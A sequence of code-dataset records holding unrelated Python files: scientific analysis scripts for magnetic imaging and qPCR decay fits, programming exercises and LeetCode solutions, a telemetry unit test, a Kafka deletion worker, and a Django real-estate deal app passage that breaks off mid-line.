-*-\n\"\"\"\nCreated on Wed Nov 23 21:56:50 2016\n\n@author: alec\n\"\"\"\n\n#---------------- IMPORTS ----------------------------------------\n#-----------------------------------------------------------------\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import ndimage\nfrom scipy import misc\nfrom scipy import signal\nfrom scipy.optimize import curve_fit\nimport scipy.fftpack as fft\nimport json\nimport matplotlib.pylab as pylab\nimport vector_reconstruction as vr\nimport load_scan as lscan\nimport fourier_image as fi\nimport format_plot as fp\n\npi = np.pi\n\nscannum = 1903\n#scanbacknum = 1740\nxres = 50\nyres = 50\nzfield = 0\nscanL = 0.5*5e-6\n\nsavepath = '/Users/alec/UCSB/cofeb_analysis_data/irmn/'\ndata = lscan.load_ff('/Users/alec/UCSB/scan_data/'+str(scannum)+'-esrdata/fitdata.txt', xres, yres, 15)\n#misc.imsave('/Users/alec/UCSB/scan_images/full-field/ff1760.png', data[0])\nffmask = ndimage.imread('/Users/alec/UCSB/scan_images/full-field/ff1903mask.png', flatten=True)\nffmask = np.multiply(np.add(np.multiply(ffmask,1/255),-0.5),-2)\n\npath = '/Users/alec/UCSB/cofeb_analysis_data/irmn/'\nfilespec = 'Msfixed'\ncal_params_path = path+'cal_parameters_'+filespec+'.json'\nwith open(cal_params_path, 'r') as fread:\n cal_params = json.load(fread)\n\nMs = cal_params['Ms']\nt = cal_params['t']\nphi = cal_params['phi']\ntheta = cal_params['theta']\nthetaError = cal_params['thetaError']\n# height = cal_params['height']\nheight = 135.0*1e-9\nheightError = cal_params['heightError']\n\n#---------------- FIT FUNCTIONS ----------------------------------\n#-----------------------------------------------------------------\n\ndef fit_tanh(x, *params):\n y = np.zeros_like(x)\n c = params[0]\n a = params[1]\n x0 = params[2]\n wid = params[3]\n\n y = c+(a/2)*np.tanh((x-x0)/wid)\n return y\n\n#---------------- RECONSTRUCTION ---------------------------------\n#-----------------------------------------------------------------\n\ndatas = np.multiply(ffmask,data[0])\ndatas0 = np.add(datas,-np.cos(theta)*zfield)\ndatas0filter = signal.wiener(datas0, 3)\ndlen = len(datas)\ncoswindow = np.zeros((dlen,dlen))\nfor j in range(0,dlen):\n for i in range(0,dlen):\n coswindow[j,i] = np.sin(pi*j/(dlen-1)) * np.sin(pi*i/(dlen-1))\n# datas0filter = signal.medfilt(datas0, 7)\n\nrecon_data = vr.vector_reconstruction(datas0filter, data[1], theta, thetaError, phi, height, scanL, kcutoff=1)\n\nbxdata = recon_data[0]\nbydata = recon_data[1]\nbzdata = recon_data[2]\nmdatak = recon_data[6]*(coswindow**2)\nVdata = recon_data[4]\nbzdataError = recon_data[5]\n\nmdata = np.real(fft.ifft2(fft.ifftshift(mdatak)))\n\nmdataint = ndimage.interpolation.zoom(mdata, 2, order=1)\n\nnp.savetxt(savepath+'bx_'+str(scannum)+'_'+filespec+'.txt', bxdata, delimiter=',')\nnp.savetxt(savepath+'by_'+str(scannum)+'_'+filespec+'.txt', bydata, delimiter=',')\nnp.savetxt(savepath+'bz_'+str(scannum)+'_'+filespec+'.txt', bzdata, delimiter=',')\nnp.savetxt(path+'bzError_'+str(scannum)+'_'+filespec+'.txt', bzdataError, delimiter=',')\nnp.savetxt(savepath+'bnv_'+str(scannum)+'_'+filespec+'.txt', data[0], delimiter=',')\nnp.savetxt(path+'mdata_'+str(scannum)+'_'+filespec+'.txt', mdata, delimiter=',')\nnp.savetxt(path+'V_'+str(scannum)+'_'+filespec+'.txt', Vdata, delimiter=',')\n\n#---------------- LINECUTS ---------------------------------------\n#-----------------------------------------------------------------\n\nx0, y0 = 22, 28\nphinum = 16\nlcnum = 15\nlclen = 15\nmphi = np.zeros((phinum,lcnum))\nfor i in range(0,phinum):\n phi = i*2*pi/phinum\n x1, y1 = x0-lclen*np.cos(phi), y0-lclen*np.sin(phi)\n x, y = np.linspace(x0, x1, lcnum), np.linspace(y0, y1, lcnum)\n mphi[i] = ndimage.map_coordinates(np.transpose(mdata), np.vstack((x,y)), order=1)\n\nx0, y0 = 21.5, 28\nphinum = 16\nbzlcnum = 15\nbzlclen = 15\nbzphi = np.zeros((phinum,bzlcnum))\nfor i in range(0,phinum):\n phi = i*2*pi/phinum\n x1, y1 = x0-lclen*np.cos(phi), y0-lclen*np.sin(phi)\n x, y = np.linspace(x0, x1, bzlcnum), np.linspace(y0, y1, bzlcnum)\n bzphi[i] = ndimage.map_coordinates(np.transpose(bzdata), np.vstack((x,y)), order=1)\n\n#---------------- LINE FITS --------------------------------------\n#-----------------------------------------------------------------\n\nxf = np.arange(0,lcnum)\nfits = np.zeros((phinum,lcnum))\nguesses = np.zeros((phinum, 4))\nwidths = np.zeros(phinum)\nr0s = np.zeros(phinum)\nangles = np.linspace(0,2*pi,phinum)\n\nfor i in range (0,phinum):\n\ty = mphi[i]\n\tguesses[i] = [(y[-1]+y[0])/2,y[-1]-y[0],6,1]\n\tpopt, pcov = curve_fit(fit_tanh, xf, mphi[i], p0=guesses[i])\n\tfits[i] = fit_tanh(xf, *popt)\n\twidths[i] = np.abs(popt[3])\n\tr0s[i] = popt[2]*scanL/xres\n\nnp.savetxt('/Users/alec/UCSB/cofeb_analysis_data/irmn/stray_field_sim/radiusphi_'+filespec+'.txt',(angles,r0s), delimiter=',')\n\nbguesses = np.zeros((phinum, 4))\nbfits = np.zeros((phinum,bzlcnum))\nbwidths = np.zeros(phinum)\nbxf = np.arange(0,bzlclen)\n\nfor i in range (0,phinum):\n y = bzphi[i]\n bguesses[i] = [(y[-1]+y[0])/2,y[-1]-y[0],6,1]\n bpopt, bpcov = curve_fit(fit_tanh, bxf, bzphi[i], p0=bguesses[i])\n bfits[i] = fit_tanh(xf, *bpopt)\n bwidths[i] = np.abs(bpopt[3])\n\n\n#---------------- PLOTS ------------------------------------------\n#-----------------------------------------------------------------\n\nplt.close('all')\n\nfig1, ax1 = plt.subplots()\nfig1.set_size_inches(4, 4)\nim1 = plt.imshow(datas0, cmap='gray', interpolation='nearest')\nfig1.colorbar(im1, ax=ax1, fraction=0.046, pad=0.04)\nax1.xaxis.set_ticklabels([])\nax1.yaxis.set_ticklabels([])\nfp.format_plot(plt, 250, 250, 50, 50)\npylab.savefig('/Users/alec/UCSB/scan_images/datas_'+str(scannum)+filespec+'.png', format='png')\n\nfig1, ax1 = plt.subplots()\nfig1.set_size_inches(4, 4)\nim1 = plt.imshow(bxdata, cmap='gray', interpolation='nearest')\nfig1.colorbar(im1, ax=ax1, fraction=0.046, pad=0.04)\nax1.xaxis.set_ticklabels([])\nax1.yaxis.set_ticklabels([])\nfp.format_plot(plt, 250, 250, 50, 50)\npylab.savefig('/Users/alec/UCSB/scan_images/bx_'+str(scannum)+filespec+'.png', format='png')\n\nfig1, ax1 = plt.subplots()\nfig1.set_size_inches(4, 4)\nim1 = plt.imshow(bydata, cmap='gray', interpolation='nearest')\nfig1.colorbar(im1, ax=ax1, fraction=0.046, pad=0.04)\nax1.xaxis.set_ticklabels([])\nax1.yaxis.set_ticklabels([])\nfp.format_plot(plt, 250, 250, 50, 50)\npylab.savefig('/Users/alec/UCSB/scan_images/by_'+str(scannum)+filespec+'.png', format='png')\n\nfig1, ax1 = plt.subplots()\nfig1.set_size_inches(4, 4)\nim1 = plt.imshow(bzdata, cmap='gray', interpolation='nearest')\nfig1.colorbar(im1, ax=ax1, fraction=0.046, pad=0.04)\nax1.xaxis.set_ticklabels([])\nax1.yaxis.set_ticklabels([])\nfp.format_plot(plt, 250, 250, 50, 50)\npylab.savefig('/Users/alec/UCSB/scan_images/bz_'+str(scannum)+filespec+'.png', format='png')\n\n\nfig1, ax1 = plt.subplots()\nim1 = plt.imshow(datas0filter, cmap='gray', interpolation='nearest')\nfig1.colorbar(im1, ax=ax1, fraction=0.046, pad=0.04)\nfp.format_plot(plt, 400, 400, 50, 50)\n\nfig1, ax1 = plt.subplots()\nfig1.set_size_inches(4, 4)\nim1 = plt.imshow(mdata, cmap='jet', interpolation='nearest')\nplt.colorbar(im1, ax=ax1, fraction=0.046, pad=0.04, use_gridspec=True)\n\nfor i in range(0,phinum):\n phi = i*2*pi/phinum\n x1, y1 = x0-lclen*np.cos(phi), y0-lclen*np.sin(phi)\n plt.plot([x0, x1], [y0, y1], 'k-')\nplt.axis('image')\nax1.xaxis.set_ticklabels([])\nax1.yaxis.set_ticklabels([])\nfp.format_plot(plt, 400, 400, 450, 50)\npylab.savefig('/Users/alec/UCSB/scan_images/meff_'+str(scannum)+filespec+'.png', format='png')\n\n\n\nfig, axes = plt.subplots(nrows=phinum, sharex=True, sharey=True)\nfig.set_size_inches(3, 5)\n\nfor i in range(0,phinum):\n\taxes[i].plot(mphi[i],'b.')\n\taxes[i].plot(xf, fit_tanh(xf, *guesses[i]), 'g')\n\taxes[i].plot(xf, fits[i], 'r')\n\taxes[i].get_yaxis().set_visible(False)\n\nfig.subplots_adjust(hspace=0)\nplt.setp([a.get_xticklabels() for a in fig.axes[:-1]], visible=False)\n#fig.tight_layout()\nax1.xaxis.set_ticklabels([])\nax1.yaxis.set_ticklabels([])\nfp.format_plot(plt, 400, 900, 900, 50, tight=False)\npylab.savefig('/Users/alec/UCSB/scan_images/meff_linecuts_'+str(scannum)+filespec+'.png', format='png')\n\n\nfig1, ax1 = plt.subplots()\nim1 = plt.imshow(mdataint, cmap='jet', interpolation='nearest')\nplt.colorbar(im1, ax=ax1, fraction=0.046, pad=0.04)\nfp.format_plot(plt, 400, 400, 50, 450)\n\n\nfig1, ax1 = plt.subplots()\nplt.imshow(bzdata, cmap='gray', interpolation='nearest')\nplt.colorbar(im1, ax=ax1, fraction=0.046, pad=0.04)\nfp.format_plot(plt, 400, 400, 450, 450)\n\nfig1, ax1 = plt.subplots()\nx = np.linspace(0,2*pi,phinum)\nplt.plot(x, r0s)\nfp.format_plot(plt, 400, 400, 850, 450)\n\nplt.show()\n","sub_path":"cofeb_analysis/irmn/vector_reconstruction_1903.py","file_name":"vector_reconstruction_1903.py","file_ext":"py","file_size_in_byte":8527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"544075166","text":"\"\"\"\nÖvning 1.41 - ☆☆ Leibnitz formel för π\nDet går att visa att följande oändliga summation:\n\n\ngår mot π (dock konvergerar serien långsamt).\nUppgiften går ut på att göra en implementation om beräknar seriens summa (med hjälp av iteration) för att beräkna närmevärden till π. Eftersom det är en oändlig serie, dvs. oändligt antal termer så är det inte rimligt att låta datorn iterera i all oändlighet. Därmed krävs det en modifiering av formeln (en approximation):\n\nGenom att öka värdet på k t.ex 100, 200, 300, . . . får du mer och mer noggranna närmevärden. Öka k i ditt program till dess att du börjar känna igen värdet på π.\nTips: Tänk på att (−1)n = 1 då n är jämnt och (−1)n = −1 då n är udda om du sätter ett tröskelvärde på storleken av termerna för att avbryta iterationen.\n\n\nAnmärkning: Datorn arbetar med flyttal som är en approximation av ett decimaltal vilket leder till att beräkningar inte är exakta.\n\"\"\"\n\n\ndef estimate_pi(k=100):\n sum = 0\n for i in range(k + 1):\n val = 1 / (2 * i + 1)\n if i % 2 == 0:\n sum += val\n else:\n sum -= val\n return 4 * sum\n\n\nprint(\"π ≈ \" + str(estimate_pi(int(input(\"k = \")))))","sub_path":"Uppgifter/1/1.41.py","file_name":"1.41.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"394592592","text":"import time\n\nfrom historical_system_profiles import db_interface\nfrom historical_system_profiles import listener_metrics as metrics\n\n\ndef _delete_profiles(data, ptc, logger):\n \"\"\"\n delete all profiles for the inventory ID in the message\n \"\"\"\n inventory_id = data.value[\"id\"]\n request_id = data.value[\"request_id\"]\n account = data.value[\"account\"]\n\n _record_recv_message(request_id, inventory_id, account, ptc)\n db_interface.delete_hsps_by_inventory_id(inventory_id)\n logger.info(\"deleted profiles for inventory_id %s\" % inventory_id)\n _record_success_message(request_id, inventory_id, account, ptc)\n\n\ndef _record_recv_message(request_id, inventory_id, account, ptc):\n metrics.delete_messages_consumed.inc()\n ptc.emit_received_message(\n \"received inventory delete event\",\n request_id=request_id,\n account=account,\n inventory_id=inventory_id,\n )\n\n\ndef _record_success_message(request_id, inventory_id, account, ptc):\n metrics.delete_messages_processed.inc()\n ptc.emit_success_message(\n \"deleted profiles for inventory record\",\n request_id=request_id,\n account=account,\n inventory_id=inventory_id,\n )\n\n\ndef _emit_delete_error(data, ptc):\n \"\"\"\n send an error message to payload tracker. This does not raise an\n exception.\n \"\"\"\n metrics.delete_messages_errored.inc()\n inventory_id = data.value[\"id\"]\n request_id = data.value[\"request_id\"]\n account = data.value[\"account\"]\n ptc.emit_error_message(\n \"error when deleting profiles for inventory record\",\n request_id=request_id,\n account=account,\n inventory_id=inventory_id,\n )\n\n\ndef event_loop(flask_app, consumer, ptc, logger, delay_seconds):\n with flask_app.app_context():\n while True:\n time.sleep(delay_seconds)\n for data in consumer:\n try:\n if data.value[\"type\"] == \"delete\":\n _delete_profiles(data, ptc, logger)\n except Exception:\n _emit_delete_error(data, ptc)\n logger.exception(\"An error occurred during message processing\")\n","sub_path":"historical_system_profiles/deleter.py","file_name":"deleter.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"325029731","text":"\"\"\"\nInput: (2 -> 4 -> 3) + (5 -> 6 -> 4)\nOutput: 7 -> 0 -> 8\n\"\"\"\nclass Solution:\n # @param {ListNode} l1\n # @param {ListNode} l2\n # @return {ListNode}\n def addTwoNumbers(self, l1, l2):\n return self.helper(l1, l2, 0)\n \n def helper(self, l1, l2, carry):\n if not l1 and not l2:\n if carry == 0:\n return\n return ListNode(1)\n elif not l1:\n return self.helper(l2, ListNode(carry), 0)\n if not l2:\n return self.helper(l1, ListNode(carry), 0)\n\n new = l1.val + l2.val + carry\n node = ListNode(new%10)\n node.next = self.helper(l1.next, l2.next, new/10)\n return node\n","sub_path":"Leetcode/addTwoNumbers.py","file_name":"addTwoNumbers.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"5082876","text":"#https://leetcode.com/problems/island-perimeter/description/\n#easy\nclass Solution(object):\n def islandPerimeter(self, grid):\n \"\"\"\n :type grid: List[List[int]]\n :rtype: int\n \"\"\"\n count = 0\n height = len(grid)\n width = len(grid[0])\n for h in range(height): \n for w in range(width): \n if grid[h][w] == 1:\n if h==0: count += 1 \n if w==0: count += 1\n if h==height-1: count += 1\n if w==width-1: count += 1\n if h-1 >= 0 and grid[h-1][w] == 0: count +=1\n if w-1 >= 0 and grid[h][w-1] == 0: count +=1\n if h+1 < height and grid[h+1][w] == 0: count +=1\n if w+1 < width and grid[h][w+1] == 0: count +=1\n \n return count\n \n","sub_path":"island-perimeter.py","file_name":"island-perimeter.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"565406421","text":"# Copyright 2019 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\nimport unittest\n\nfrom telemetry.internal.results import page_test_results\nfrom telemetry.internal.platform.tracing_agent import telemetry_tracing_agent\nfrom tracing.trace_data import trace_data\n\nfrom py_trace_event import trace_event\n\n\nclass FakeTraceDataBuilder(object):\n def __init__(self):\n \"\"\"A fake trace bulder that just captures trace data written to it.\"\"\"\n self._data = None\n\n def AddTraceFor(self, trace_part, data):\n assert self._data is None\n assert trace_part is trace_data.TELEMETRY_PART\n self._data = data\n\n def GetEventNames(self):\n return [e['name'] for e in self._data['traceEvents']]\n\n def GetTelemetryInfo(self):\n return self._data['metadata']['telemetry']\n\n\n@unittest.skipUnless(trace_event.is_tracing_controllable(),\n 'py_trace_event is not supported')\nclass TelemetryTracingAgentTest(unittest.TestCase):\n def setUp(self):\n platform = None # Does not actually need one.\n self.agent = telemetry_tracing_agent.TelemetryTracingAgent(platform)\n self.config = None # Does not actually need one.\n\n def tearDown(self):\n if self.agent.is_tracing:\n self.agent.StopAgentTracing()\n\n def testAddTraceEvent(self):\n self.agent.StartAgentTracing(self.config, timeout=10)\n with trace_event.trace('test-marker'):\n pass\n self.agent.StopAgentTracing()\n trace = FakeTraceDataBuilder()\n self.agent.CollectAgentTraceData(trace)\n self.assertIn('test-marker', trace.GetEventNames())\n\n def testRecordClockSync(self):\n self.agent.StartAgentTracing(self.config, timeout=10)\n self.agent.RecordIssuerClockSyncMarker('1234', issue_ts=0)\n self.agent.StopAgentTracing()\n trace = FakeTraceDataBuilder()\n self.agent.CollectAgentTraceData(trace)\n self.assertIn('clock_sync', trace.GetEventNames())\n\n def testWriteTelemetryInfo(self):\n info = page_test_results.TelemetryInfo()\n info.benchmark_name = 'example'\n info.benchmark_start_epoch = 0\n\n self.agent.StartAgentTracing(self.config, timeout=10)\n self.agent.SetTelemetryInfo(info)\n self.agent.StopAgentTracing()\n trace = FakeTraceDataBuilder()\n self.agent.CollectAgentTraceData(trace)\n benchmarks = trace.GetTelemetryInfo()['benchmarks']\n self.assertEqual(len(benchmarks), 1)\n self.assertEqual(benchmarks[0], 'example')\n","sub_path":"src/third_party/catapult/telemetry/telemetry/internal/platform/tracing_agent/telemetry_tracing_agent_unittest.py","file_name":"telemetry_tracing_agent_unittest.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"161451079","text":"# -*- coding: utf-8 -*-\nimport math\na = int(input(\"Valor a ser sacalo em reais:\"))\n#COMECE SEU CODIGO AQUI\nc20 = a//20\na = a%20\nc10 = a//10\na = a%10\nc5 = a//5\na = a%5\nc2 = a//2\na = a%2\nc1 = a//1\nprint(c20)\nprint(c10)\nprint(c5)\nprint(c2)\nprint(c1)\n","sub_path":"moodledata/vpl_data/154/usersdata/274/65500/submittedfiles/atm.py","file_name":"atm.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"509010491","text":"#!/usr/bin/env python3\n\n\"\"\"\\\nUsage:\n gfp_timecourse.py [options]\n\nArguments:\n \n A path to a TOML file describing the layout of a qPCR plate. See \n https://pypi.org/project/bio96/ for more details.\n\nOptions:\n -o --output PATH\n Save the plot to the given path. The file type will be inferred from \n the extension. '$' will be replaced with the name of the input TOML \n file (minus the extension).\n\n -O --drop-outliers\n Remove any data points labeled as outliers.\n\"\"\"\n\nimport docopt\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom pathlib import Path\nfrom inspect import getfullargspec\nfrom numpy import inf\nfrom scipy.optimize import curve_fit\nfrom sgrna_sensor import qpcr\nfrom sgrna_sensor.style import pick_style, pick_data_style\n\ndef decay(t, k, y0, y_inf):\n return y0 * 2**(-t/k) + y_inf\n\ndef fit_decay(df):\n t = df.index.get_level_values('time')\n y = df['fold_change']\n\n p0 = 5, max(y), min(y)\n bounds = (\n (0, 0, 0),\n (inf, inf, inf),\n )\n\n fit_args = getfullargspec(decay).args[1:]\n fit_params, fit_covar = curve_fit(decay, t, y, p0, bounds=bounds)\n\n col_names = fit_args + [f'{x}_std' for x in fit_args]\n col_values = list(fit_params) + list(np.sqrt(np.diag(fit_covar)))\n return pd.Series(dict(zip(col_names, col_values)))\n\nargs = docopt.docopt(__doc__)\ntoml_path = Path(args[''])\n\nattrs = ['primers', 'sgrna', 'ligand', 'time']\nquery = 'outlier == False' if args['--drop-outliers'] else None\ndf = qpcr.load(toml_path, query=query, aggregate=attrs, reference='16s')\n\npd.set_option('display.max_rows', 10000)\nprint(df)\n\nsgrnas = sorted(df.index.get_level_values('sgrna').unique(),\n key=lambda x: ['on', 'off', 'rxb/11/1', 'mhf/30'].index(x))\nligands = sorted(df.index.get_level_values('ligand_after').unique(),\n key=lambda x: [False, True].index(x))\ntimes = df.index.get_level_values('time').unique()\n\nfig, axes = plt.subplots(\n len(ligands),\n len(sgrnas),\n figsize=(4*len(sgrnas), 4*len(ligands)),\n sharex=True,\n squeeze=False,\n)\n\nfor i, ligand in enumerate(ligands):\n for j, sgrna in enumerate(sgrnas):\n ax = axes[i,j]\n fit_style = pick_style(sgrna, ligand)\n data_style = pick_data_style(sgrna, ligand)\n\n q = df.loc[sgrna, ligand]\n\n t = q.index.get_level_values('time')\n y = q['fold_change']\n\n ax.plot(t, y, label='_', **data_style)\n\n fit = fit_decay(q)\n t_fit = np.linspace(0, max(t), 500)\n y_fit = decay(t_fit, fit.k, fit.y0, fit.y_inf)\n label = f'''\\\nk={fit.k:.1e} ± {fit.k_std:.1e}\ny0={fit.y0:.1e} ± {fit.y0_std:.1e}\ny∞={fit.y_inf:.1e} ± {fit.y_inf_std:.1e}'''\n\n ax.plot(t_fit, y_fit, label=label, **fit_style)\n ax.legend(loc='best')\n\nfor ax in axes[:,0]:\n ax.set_ylabel(\"GFP mRNA level\\n[rel. to 16S rRNA]\")\nfor ax in axes[-1,:]:\n ax.set_xlabel(\"Time [min]\")\nfor i, ax in enumerate(axes[0,:]):\n ax.set_title(sgrnas[i])\nfor ax in axes.flat:\n ax.set_xlim(min(times), max(times))\n\nfig.tight_layout()\n\nif args['--output']:\n path = args['--output'].replace('$', toml_path.stem)\n fig.savefig(path)\n\nplt.show()\n","sub_path":"notebook/20181115_measure_ligrna_induction_time_scale/fit_half_life.py","file_name":"fit_half_life.py","file_ext":"py","file_size_in_byte":3242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"545923304","text":"#\n# [72] Edit Distance\n#\n# https://leetcode.com/problems/edit-distance/description/\n#\n# algorithms\n# Hard (33.23%)\n# Total Accepted: 123.3K\n# Total Submissions: 370K\n# Testcase Example: '\"horse\"\\n\"ros\"'\n#\n# Given two words word1 and word2, find the minimum number of operations\n# required to convert word1 to word2.\n#\n# You have the following 3 operations permitted on a word:\n#\n#\n# Insert a character\n# Delete a character\n# Replace a character\n#\n#\n# Example 1:\n#\n#\n# Input: word1 = \"horse\", word2 = \"ros\"\n# Output: 3\n# Explanation:\n# horse -> rorse (replace 'h' with 'r')\n# rorse -> rose (remove 'r')\n# rose -> ros (remove 'e')\n#\n#\n# Example 2:\n#\n#\n# Input: word1 = \"intention\", word2 = \"execution\"\n# Output: 5\n# Explanation:\n# intention -> inention (remove 't')\n# inention -> enention (replace 'i' with 'e')\n# enention -> exention (replace 'n' with 'x')\n# exention -> exection (replace 'n' with 'c')\n# exection -> execution (insert 'u')\n#\n#\n#\nclass Solution:\n def minDistance(self, word1, word2):\n \"\"\"\n :type word1: str\n :type word2: str\n :rtype: int\n \"\"\"\n # Algorithm from http://asr.cs.cmu.edu/spring2014/lectures/class4.DP.pdf\n\n m = len(word1)\n n = len(word2)\n table = [[0 for _ in range(n+1)] for _ in range(m+1)]\n for i in range(m+1):\n for j in range(n+1):\n if i == 0 or j == 0:\n table[i][j] = max(i, j)\n else:\n table[i][j] = min(\n table[i-1][j] + 1,\n table[i][j-1] + 1,\n table[i-1][j-1] + (1 if word1[i-1] != word2[j-1] else 0),\n )\n return table[-1][-1]\n","sub_path":"LeetCodeSolutions/72.edit-distance.python3.py","file_name":"72.edit-distance.python3.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"260774793","text":"from django.shortcuts import render,redirect\nfrom .models import *\nfrom django.contrib import messages\nfrom .view_method import *\nimport json,requests\nfrom datetime import datetime\nimport datetime as datetime_\nfrom django_pandas.io import read_frame\nfrom django.db import IntegrityError\nfrom django.contrib.auth.decorators import login_required\nimport sys,six,json\nfrom django.http import JsonResponse\nfrom django.core.paginator import Paginator\nimport pandas as pd\nfrom .enums import *\nfrom django.http import JsonResponse\n# Create your views here.\n\n\n@login_required\ndef search_deals(request):\n if request.method == 'POST':\n search_str = json.loads(request.body).get('searchText')\n deals = Deals.objects.filter(date__icontains=search_str, owner=request.user) | Deals.objects.filter(\n name__icontains=search_str, owner=request.user)\n data = deals.values()\n return JsonResponse(list(data), safe=False)\n\n \ndef index(request):\n \"\"\"\n This view is to display the landing page\n\n \"\"\"\n\n return render(request, 'deal/Views/index.html')\n\n# Create your views here.\n@login_required\ndef view_deal(request):\n \"\"\"\n This view is to display the landing page\n\n \"\"\"\n\n deal = Deals.objects.filter(owner =request.user)\n paginator = Paginator(deal, 5)\n page_number = request.GET.get('page')\n page_obj = Paginator.get_page(paginator, page_number)\n\n context = {'saved_deals':deal,\n 'page_obj': page_obj}\n return render(request, 'deal/Views/dashboard.html',context)\n@login_required\ndef dashboad(request):\n \"\"\"\n This view is to display the landing page\n\n \"\"\"\n\n deal = Deals.objects.filter(owner =request.user)\n paginator = Paginator(deal, 5)\n page_number = request.GET.get('page')\n page_obj = Paginator.get_page(paginator, page_number)\n\n context = {'saved_deals':deal,\n 'page_obj': page_obj}\n return render(request, 'deal/Views/dashboad.html',context)\n\ndeal_data =None\ndef add_deal(request):\n \"\"\"\n Form for deal name and property status\n \"\"\"\n property_status = PropertyStatus.objects.all()\n context = {\n 'property_status':property_status\n }\n\n if request.method == 'GET':\n\n return render(request, 'deal/Views/add-deal.html', context)\n if request.method =='POST':\n name = request.POST['name']\n scheduler_time = request.POST['time']\n print(\"######## Deal's name is \", name)\n # import pdb\n #pdb.set_trace()\n property_status = request.POST['property_status']\n \n global deal_data\n def deal_data():\n return property_status, name\n if not name:\n messages.error(request, 'Name is required')\n return render(request, 'deal/Views/add-deal.html', context)\n\n \n\n return redirect('address_assets')\n\n\ndef address_asset(request):\n sort = Sort.objects.all()\n property_type = PropertyType.objects.all()\n expand_search_radius = ExpandSearchRadius.objects.all()\n home_size = HomeSize.objects.all()\n in_unit_features = InUnitFeatures.objects.all()\n community_ammenities = CommunityAmmenities.objects.all()\n ok = Ok.objects.all()\n\n sort_sale = SortSale.objects.all()\n property_type_sale = PropertyTypeSale.objects.all()\n property_type_nyc_only = PropertyTypeNycOnly.objects.all()\n no_hoa_fee = NoHoaFee.objects.all()\n home_size_min_sale = HomeSizeMinSale.objects.all()\n home_size_max_sale = HomeSizeMaxSale.objects.all()\n lot_size = LotSize.objects.all()\n stories = Stories.objects.all()\n garage = Garage.objects.all()\n heating_cooling = HeatingCooling.objects.all()\n inside_rooms = InsideRooms.objects.all()\n outside_features = OutsideFeatures.objects.all()\n lot_views = LotViews.objects.all()\n community_ammenities_sale = CommunityAmmenitiesSale.objects.all()\n features_in_nyc_only = FeaturesInNycOnly.objects.all()\n\n\n context = {\n 'sort':sort,\n 'property_types':property_type,\n 'expand_search_radius':expand_search_radius,\n 'home_sizes':home_size,\n 'in_unit_features':in_unit_features,\n 'community_ammenities':community_ammenities,\n 'ok':ok,\n 'sort_sales':sort_sale,\n 'property_type_sales':property_type_sale,\n 'property_type_nyc_only':property_type_nyc_only,\n 'no_hoa_fees':no_hoa_fee,\n 'home_size_min_sales':home_size_min_sale,\n 'home_size_max_sales':home_size_max_sale,\n 'lot_sizes':lot_size,\n 'stories':stories,\n 'garages':garage,\n 'heating_coolings':heating_cooling,\n 'inside_rooms':inside_rooms,\n 'outside_features':outside_features,\n 'lot_views':lot_views,\n 'community_ammenities_sales':community_ammenities_sale,\n 'features_in_nyc_only':features_in_nyc_only\n\n }\n \n if request.method == 'GET':\n \n \n \n return render(request, 'deal/Views/address_asset.html', context)\n \n if request.method == 'POST':\n city = request.POST['city']\n state_code = request.POST['state_code']\n location = request.POST['location']\n \n \n if not city:\n messages.error(request, 'City is required')\n return render(request, 'deal/Views/address_asset.html', context)\n if not state_code:\n messages.error(request, 'State code is required')\n return render(request, 'deal/Views/address_asset.html', context)\n \n\n query= request.POST\n query_data = query.copy()\n # print(query_data)\n query_data.pop('csrfmiddlewaretoken')\n d = {k:v.strip('[]') for k,v in query_data.items()}\n print(\"Data to make API call is : \", d)\n\n \n \n \n \n print(\"computing Deal......\\n\")\n response = property_search_query(url = url_for_sale, query_params=d)\n df = process_query_response(response=response)\n #deal_df = pd.read_csv('/Users/home/Documents/GitHub/WhiteCow2/deal/deal_df.csv')\n #df = pd.read_csv('/Users/home/Documents/GitHub/WhiteCow2/sale.csv')\n list_property_id = df['property_id'].tolist()[:3]\n deal_dict = calculate_deal(list_property_id, df)\n \n deal_df = get_deal_datafrane(deal_dict, df)\n \n deal_df = deal_df.where(deal_df.notnull(), None)\n\n deal_df = formatting(deal_df)\n print(\"Here is the Deal \\n\")\n print(deal_df)\n\n context['deals'] = deal_df\n \n \n property_type = d['property_type']\n context['property_type'] = property_type\n\n request.session['city'] = city\n request.session['state_code'] = state_code\n request.session['location'] = location\n request.session['d'] = d\n deal= json.loads(deal_df.to_json())\n request.session['deal_df'] = deal\n\n \n context['deals'] = deal_df\n return render(request, 'deal/Views/address_asset.html', context)\n \n\n\n\n\ndef save_deal(request):\n\n \n \n\n if request.method == 'POST':\n \n name = request.POST.get('name')\n time = request.POST.get('time')\n city = request.session['city'] \n state_code = request.session['state_code']\n location = request.session['location']\n assets = request.session['d']\n deal= request.session['deal_df']\n deal = pd.DataFrame.from_dict(deal)\n\n for i in deal.itertuples():\n \n deal['last_update_date'] = datetime.fromtimestamp(i.last_update_date / 1e3) \n deal['list_date'] = datetime.fromtimestamp(i.list_date / 1e3) \n #deal = formatting(deal)\n \n \n Deals.objects.create(name = name,owner=request.user)\n de = Deals.objects.latest('id')\n if time != \"\":\n if TimeInterval(time) is TimeInterval.one_min:\n Setup.objects.create(title=name,owner=request.user,deal=de,time_interval = TimeInterval.one_min)\n if TimeInterval(time) is 